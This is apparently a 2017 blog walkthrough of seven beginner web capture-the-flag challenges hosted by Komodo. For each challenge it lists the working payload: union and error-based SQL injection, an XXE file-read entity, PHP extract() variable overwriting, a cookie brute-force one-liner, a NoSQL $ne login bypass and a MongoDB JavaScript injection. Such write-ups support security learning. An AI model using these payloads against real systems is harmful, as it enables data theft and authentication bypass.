Thursday, June 29, 2017

Easy Komodo CTF Walkthrough/Solutions. Wasted 2:45h of my life.

Easy challenges by Komodo Israel, completed in 2 hours 45 minutes (have proof :).

For the report, original leader-board looked like this:


Challenge 1 - Union based SQL Injection:


GET Request:
http://ctf.komodosec.com/challenge-1.php?city=lame-challenge' union select 1,flag,3,4,5 from flags%23

Challenge 2 - SQL Injection via ORDER/GROUP by:


GET Request:
http://ctf.komodosec.com/challenge-2.php?city=lame-challenge2&ob=extractvalue(0x0a,concat(0x0a,(select flag from flags)))-BR

Challenge 3 - XXE:


Enable hidden form:


POST Request:
data=<?xml version="1.0" ?>
<!DOCTYPE nopernik [
<!ENTITY lame-xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/challenge-3.php">]>
<books><book>%26lame-xxe;</book></books>


Challenge 4 - Variable assignment via extract():


Get hint and PHP source code:
root@nopernik:~# echo ICcnLmpvaW4oW2NocihvcmQoaSleODIpIGZvciBpIGluICdcJyE3ciQ7NyUhPVwnIDE3ciIzIDM/J10p|base64 -d
 ''.join([chr(ord(i)^82) for i in '\'!7r$;7%!=\' 17r"3 3?'])

root@nopernik:~# python
>>> ''.join([chr(ord(i)^82) for i in '\'!7r$;7%!=\' 17r"3 3?'])
'use viewsource param'
>>>
GET Request:
http://ctf.komodosec.com/challenge-4.php?viewsource=lame-challenge

From source code we can understand that the main functionality of the script is to send email. We have to find out how to inject our email address into $sendTo variable.
For that purpose we will utilize extract() function, which will assign every value from given array to variable named by key name. $_GET[] - is an array that will passed to extract() function. We can manipulate that array via GET Request.
Also we can see that the script will print out $error value. Let's verify that:
GET http://ctf.komodosec.com/challenge-4.php?extract=p&error=lame-challenge
We will see lame-challenge in server's response.

Next, we want to change $sendTo variable, luckily it is assigned before extract() function.

http://ctf.komodosec.com/challenge-4.php?extract=p&sendTo=nopernik@gmail.com
Check your spam folder.

Challenge 5 - Weak encryption:


Once we log in with some name except "admin" we will get cookie:
my_session=StxtqfSPt%2BE1WNG9wdoUCauaqGP%2FKu0wGciMJkwnxoA%3D
Then by decoding that cookie and changing the first character, we will see the server's output changed.

Using "bdmin" account, by changing the first character, we can easily bruteforce cookie for "admin" account with only 256 requests.

Python one-liner script that will generate all possible variations:
a='your_cookie'.decode('base64'); print ''.join([(chr(i)+a[1:]).encode('base64') for i in range(256)])

Paste 256 resulting lines into intruder, and get your flag:



Challenge 6 - NO SQL Injection:


Everyone stucks with overflow the stack with 1885979.
But if you goolge it, you will get https://stackoverflow.com/questions/1885979/php-get-variable-array-injection
Arrays?? NO SQL Injection.

POST Request:
name[$ne]=&password[$ne]=&submit=Submit+Form

Challenge 7 - MongoDB Injection:


MongoDB & Javascript

POST Request:
question='});return db.getCollectionNames();}//&validate=Ask